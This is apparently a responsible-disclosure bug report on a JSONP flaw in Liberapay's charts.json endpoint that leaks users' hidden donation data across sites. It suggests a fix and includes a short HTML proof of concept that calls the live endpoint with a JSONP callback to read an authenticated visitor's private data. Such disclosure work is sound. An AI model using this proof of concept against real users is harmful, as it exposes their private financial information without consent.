Hello!
The /username/charts.json
endpoint can return a JSONP callback due to the fact that jsonp_dump
is used in the file charts.json.spt
. It appears that the content of the JSONP request depends on the authentication of the user. If the user enabled the privacy setting which hides the receiving donation data of the user, a 403 error will be returned unless the user is authenticated.
This happens here:
if participant.hide_receiving:
if user != participant and not user.is_admin:
raise response.error(403)
The vulnerable code is here:
[---] application/json via jsonp_dump
Basically, a jsonp_dump
is unnecessary in this case (I did not notice a case where cross-domain requests need to be done), and it should be replaced with json_dump
instead.
This would eventually allow any site to call the JSONP callback, and receive the receiving donation data of the user, despite itβs privacy settings. This will lead to unwanted information disclosure.
<script>
function rip(a) {
alert(JSON.stringify(a[1]));
}
</script>
<script src="https://liberapay.com/~153779/charts.json?callback=rip"></script>
Host this file, visit the site authenticated and it will print out the first row in the JSON Array. If you have not received any donation through LIbrapay so far, an empty JSON array will be returned.
This will lead to unwanted information disclosure due to the fact that privacy settings of the user will be ignored.